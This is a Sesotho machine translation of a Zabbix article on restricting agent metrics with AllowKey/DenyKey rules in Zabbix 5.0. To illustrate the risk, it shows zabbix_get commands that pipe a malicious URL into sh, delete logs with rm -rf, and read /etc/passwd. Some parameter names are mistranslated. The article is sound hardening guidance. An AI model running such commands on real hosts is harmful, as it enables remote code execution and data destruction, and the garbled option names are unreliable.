Ts'ehetso ea lenane le khethiloeng bakeng sa metrics ea lehlakore la baemeli
Tikhon Uskov, Moenjiniere oa Kopanyo, Zabbix
Litaba tsa ts'ireletso ea data
Zabbix 5.0 e na le tšobotsi e ncha e u lumellang hore u ntlafatse ts'ireletso lits'ebetsong tse sebelisang Zabbix Agent mme e nke sebaka sa parameter ea khale. NobleRemoteCommands.
Lintlafatso tsa ts'ireletso ea litsamaiso tse thehiloeng ho moemeli li bakoa ke taba ea hore moemeli a ka etsa palo e kholo ea liketso tse ka bang kotsi.
- Moemeli a ka bokella hoo e batlang e le tlhahisoleseling efe kapa efe, ho kenyeletsoa tlhahisoleseling ea lekunutu kapa e ka bang kotsi, ho tsoa lifaeleng tsa tlhophiso, lifaele tsa log, lifaele tsa password, kapa lifaele tse ling.
Mohlala, ka ho sebelisa zabbix_get utility, o ka fihlella lenane la basebelisi, libuka tsa bona tsa lapeng, lifaele tsa password, jj.
Ho fihlella data ho sebelisa zabbix_get utility
TIISETSO. Lintlha li ka khutlisoa feela haeba moemeli a balile litumello faeleng e tsamaisanang le eona. Empa, mohlala, file /etc/passwd/ e ka baloang ke basebelisi bohle.
- Moemeli a ka boela a phethahatsa litaelo tse ka bang kotsi. Ka mohlala, senotlolo *system.run[]** e u lumella ho phethahatsa litaelo leha e le life tse hole le li-node tsa marang-rang, ho kenyeletsoa le mangolo a tsoang ho Zabbix web interface e fanang ka litaelo ka lehlakoreng la moemeli.
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]- Ho Linux, moemeli o sebetsa ka ho sa feleng ntle le litokelo tsa motso, ha Windows e sebetsa e le ts'ebeletso joalo ka Sistimi mme e na le phihlello e sa lekanyetsoang ea sistimi ea faele. Ka hona, haeba ho se na liphetoho tse etsoang ho parameters ea Zabbix Agent ka mor'a ho kenya, moemeli o na le monyetla oa ho fumana ngoliso, tsamaiso ea faele mme a ka etsa lipotso tsa WMI.
Liphetolelong tsa pejana parameter EnableRemoteCommands=0 lumella feela ho tima metrics ka senotlolo *system.run[]** le ho sebelisa lingoloa ho tsoa ho sehokelo sa tepo, empa ho ne ho se mokhoa oa ho thibela phihlello ea lifaele ka bomong, ho lumella kapa ho tima linotlolo tse kentsoeng le moemeli, kapa ho fokotsa tšebeliso ea li-parameter ka bomong.
Ho sebelisa EnableRemoteCommand parameter liphetolelong tsa pejana tsa Zabbix
AllowKey/DenyKey
Zabbix 5.0 e thusa ho sireletsa khahlanong le phihlello e sa lumelloeng ka ho fana ka li-whitelists le li-blacklists bakeng sa ho lumella le ho hana metrics lehlakoreng la moemeli.
Ho Zabbix 5.0 linotlolo tsohle, ho kenyelletsa le *system.run[]** li nolofalitsoe, 'me likhetho tse peli tse ncha tsa litlhophiso li kentsoe:
LumellaKey= - licheke tse lumelletsoeng;
DenyKey= - licheke tse thibetsoeng;
e kae paterone ea lebitso la sehlooho e nang le liparamente tse sebelisang li-metacharacters (*).
Likonopo tsa AllowKey le DenyKey li u lumella ho lumella kapa ho hana litekanyetso tsa motho ka mong ho latela mokhoa o itseng. Ho fapana le li-parameter tse ling tsa tlhophiso, palo ea li-parameter tsa AllowKey/DenyKey ha e na moeli. Sena se o nolofalletsa ho hlalosa ka ho hlaka seo moemeli a ka se etsang tsamaisong ka ho theha sefate sa licheke - linotlolo tse sebetsang, moo tatellano eo li ngotsoeng ka eona e phethang karolo ea bohlokoa haholo.
Tatellano ea melao
Melao e hlahlojoa ka tatellano eo e kenngoa ka eona faeleng ea tlhophiso. Senotlolo se hlahlojoa ho ea ka melao pele ho papali ea pele, 'me hang ha senotlolo sa lintlha tsa data se lumellana le mohlala, se lumelloa kapa se haneloa. Ka mor'a sena, ho emisa ho hlahloba melao le linotlolo tse setseng li hlokomolohuoa.
Ka hona, haeba ntho e lumellana le molao oa tumello le oa ho hana, sephetho se tla itšetleha ka hore na ke molao ofe oa pele ho faele ea tlhophiso.
Melao e 2 e fapaneng e nang le paterone e tšoanang le senotlolo vfs.file.size[/tmp/file]
Taelo ea ho sebelisa linotlolo tsa AllowKey/DenyKey:
- melao e nepahetseng,
- melao e akaretsang,
- molao o thibelang.
Ka mohlala, haeba u hloka ho fumana lifaele foldareng e itseng, u tlameha ho qala ka ho li lumella ho li fumana, ebe u hana ntho e 'ngoe le e' ngoe e sa oeleng ka har'a tumello e behiloeng. Haeba molao oa ho hana o sebelisoa pele, phihlello ea foldara e tla haneloa.
Tatelano e nepahetseng
Haeba o hloka ho lumella lits'ebeletso tse 2 ho sebetsa ka *system.run[]**, 'me molao oa ho hana o tla hlalosoa pele, lisebelisoa li ke ke tsa qalisoa, hobane mohlala oa pele o tla lula o lumellana le senotlolo leha e le sefe,' me melao e latelang e tla hlokomolohuoa.
Tatelano e fosahetseng
Mekhoa
Melao ea motheo
Paterone ke polelo e nang le li-wildcards. Metacharacter (*) e bapisa palo efe kapa efe ea litlhaku tse sebakeng se itseng. Li-metacharact li ka sebelisoa ka bobeli lebitsong la senotlolo le ho li-parameter. Mohlala, o ka hlalosa ka botlalo paramente ea pele ka mongolo, 'me u hlalose e latelang e le wildcard.
Liparamente li tlameha ho kenngoa ka masakaneng a sekwere [].
system.run[*- e fosahetsevfs.file*.txt]- e fosahetsevfs.file.*[*]- hantle
Mehlala ea ho sebelisa wildcard.
- Lebitsong la senotlolo le ho parameter. Tabeng ena, senotlolo ha se tsamaisane le senotlolo se tšoanang se se nang parameter, kaha ka mohlala re bontšitse hore re batla ho fumana qetello e itseng ea lebitso la sehlooho le sete e itseng ea litekanyo.
- Haeba paterone e sa sebelise masakaneng a lisekoere, paterone e lumella linotlolo tsohle tse se nang paramethara mme e hana linotlolo tse nang le paramethara e boletsoeng.
- Haeba senotlolo se ngotsoe ka botlalo 'me li-parameter li hlalositsoe e le wildcard, e tla lumellana le senotlolo leha e le sefe se ts'oanang le litekanyetso leha e le life' me e ke ke ea tšoana le senotlolo ntle le li-brackets tsa lisekoere, ke hore, e tla lumelloa kapa e haneloe.
Melao ea ho tlatsa li-parameter.
- Haeba senotlolo se nang le li-parameter se reretsoe ho sebelisoa, litekanyetso li tlameha ho boleloa faeleng ea tlhophiso. Li-parameter li tlameha ho hlalosoa e le metcharacter. Hoa hlokahala ho hana ka hloko ho fihlella faele leha e le efe mme o nahanele hore na metric e ka fana ka tlhahisoleseding efe tlas'a li-spellings tse fapaneng - tse nang le li-parameters.
Likarolo tsa ho ngola linotlolo tse nang le li-parameter
- Haeba senotlolo se hlalositsoe ka li-parameter, empa litlhophiso ke tsa boikhethelo 'me li hlalosoa e le metacharacter, senotlolo se se nang li-parameter se tla rarolloa. Ka mohlala, haeba u batla ho thibela tlhahisoleseding e mabapi le mojaro ho CPU 'me u hlakise hore senotlolo sa system.cpu.load[*] se lokela ho tima, u se ke ua lebala hore senotlolo se se nang li-parameter se tla khutlisa boleng bo tloaelehileng ba mojaro.
Melao ea ho tlatsa li-parameter
Lintlha
phetoho
- Melao e meng e ke ke ea fetoloa ke mosebelisi, mohlala, melao ea ho sibolla kapa melaoana ea boingoliso ea moemeli. Melao ea AllowKey/DenyKey ha e ame lintlha tse latelang:
- HostnameItem
- HostMetadataItem
- HostInterfaceItem
TIISETSO. Haeba molaoli a tima senotlolo, ha a botsoa, Zabbix ha e fane ka leseli la hore na hobaneng metric kapa senotlolo se oela sehlopheng sa '.TS'ESO TS'ESO'. Tlhahisoleseding e mabapi le dithibelo mabapi le ho phetha ditaelo tsa remoutu le yona ha e bonngwe difaeleng tsa log ya baemedi. Sena ke ka mabaka a ts'ireletso, empa se ka thatafatsa ho lokisa liphoso haeba metrics e oela sehlopheng se sa tšehetsoeng ka lebaka le itseng..
- Ha ua lokela ho itšetleha ka tatellano efe kapa efe e khethehileng bakeng sa ho hokahanya lifaele tsa tlhophiso ea kantle (mohlala, ka tatellano ea alfabeta).
Taelo Line Utilities
Ka mor'a ho theha melao, u lokela ho etsa bonnete ba hore ntho e 'ngoe le e' ngoe e hlophisitsoe hantle.
U ka sebelisa e 'ngoe ea likhetho tse tharo:
- Kenya metric ho Zabbix.
- Teko ka zabbix_agentd. Moemeli oa Zabbix o nang le khetho - hatisa (-p) e bonts'a linotlolo tsohle (tse lumelletsoeng ka ho sa feleng) ntle le tse sa lumelloeng ke tlhophiso. Le ka khetho -teko (-t) hobane senotlolo se hanetsoeng se tla khutla 'Senotlolo sa ntho e sa tšehetsoeng'.
- Teko ka zabbix_fumana. Tšebeliso zabbix_fumana ka kgetho -k ke tla khutlaZBX_NOTSUPPORTED: Meteriki e sa tsejoeng'.
Lumella kapa hana
O ka hana ho fihlella faele mme o netefatsa, mohlala, o sebelisa ts'ebeliso zabbix_fumanahore phihlello ea faele e hanetsoe.
**
TIISETSO. Litlhaloso tsa paramethara li hlokomolohuoa.
Tabeng ena, ho fihlella faele e joalo ho ka lumelloa ka tsela e fapaneng. Ka mohlala, haeba symlink e lebisa ho eona.
Ho khothalletsoa ho hlahloba likhetho tse fapaneng bakeng sa ho sebelisa melao e boletsoeng, hape o nahane ka menyetla ea ho qoba lithibelo.
Lipotso le likarabo
Potso ea hau. Ke hobane'ng ha mokhoa o rarahaneng hakaale o nang le puo ea oona o khethiloe ho hlalosa melao, tumello le lithibelo? Hobaneng ho ne ho sa khonehe ho sebelisa, mohlala, mantsoe a tloaelehileng ao Zabbix a a sebelisang?
Araba. Ena ke taba ea ts'ebetso ea regex kaha hangata ho na le moemeli a le mong feela mme e hlahloba palo e kholo ea metrics. Regex ke ts'ebetso e boima haholo 'me ha re khone ho sheba likete tsa metrics ka tsela ena. Wildcards - tharollo ea bokahohle, e sebelisoang haholo le e bonolo.
Potso ea hau. Na lifaele ha li kenyelelitsoe ka tatellano ea alfabeta?
Araba. Ho ea kamoo ke tsebang kateng, ho batla ho le thata ho bolela esale pele hore na melao e tla sebelisoa joang haeba u phatlalatsa melao ho lifaele tse fapaneng. Ke khothaletsa ho bokella melao eohle ea AllowKey/DenyKey ho e le 'ngoe Kenyelletsa faele, hobane e sebelisana, mme e kenyelletsa faele ena..
Potso ea hau. Ho Zabbix 5.0 khetho 'NobleRemoteCommands=' ha e eo faeleng ea tlhophiso, 'me ke AllowKey/DenyKey feela e fumanehang?
Araba. Ee ho jwalo.
Kea le leboha ka tlhokomelo ea hau!
Source: www.habr.com